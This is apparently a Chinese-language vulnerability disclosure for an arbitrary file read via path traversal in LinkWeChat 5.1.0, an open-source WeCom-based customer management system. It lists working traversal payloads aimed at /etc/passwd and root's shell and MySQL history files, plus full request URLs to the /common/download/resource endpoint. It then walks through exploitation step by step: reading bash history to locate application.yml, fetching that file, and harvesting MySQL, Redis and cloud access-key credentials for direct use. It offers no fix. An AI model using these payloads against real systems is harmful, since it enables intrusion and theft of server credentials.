0x01 前言
LinkWeChat 是基于企业微信的开源 SCRM 系统,是企业私域流量管理与营销的综合解决方案。不仅集成了企微强大的后台管理及基础的客户管理功能,而且提供了多种渠道、多个方式连接微信客户。主要运用于电商、零售、教育、金融、政务等服务行业领域化。
该系统存在任意文件读取漏洞,使用输入 /profile/../../../../../etc/passwd 操作参数名称会导致路径遍历,可以远程发起攻击.
0x02 影响版本
LinkWechat 5.1.0
0x03 漏洞POC
/profile/../../../../../etc/passwd
/profile/../../../../../root/.bash_history
/profile/../../../../../root/.mysql_history
xxxx.com/common/download/resource?name=/profile/../../../../../root/.bash_history
xxxx.com/common/download/resource?name=/profile/../../../../../etc/passswd
0x03 漏洞利用过程
一般情况下,通过任意文件读取的漏洞获取到系统敏感配置文件和账密。比如我使用 /profile/../../../../../root/.bash_history 去读取历史命名文件,然后本地审计一下该文件,获取到管理员操作的命令,一般命令都会暴露应用的配置目录,比如如下所示:
cd /root/
ll
vi tomcat/webapps/xxxxx/WEB-INF/classes/application.yml
ll
df -h
通过该命令我们就可以直接通过任意文件读取直接拿到该yml文件。
xxxxx/common/download/resource?name=/profile/../../../../..//root/tomcat/tomcat/webapps/xxxx/WEB-INF/classes/application.yml
当然其他文件也可以通过这种方式获取到。
后面对其yml文件进行研究,发现文件当中配置了大量的账户密码,包括mysql、redis、ak/sk等等,可以直接进行利用。
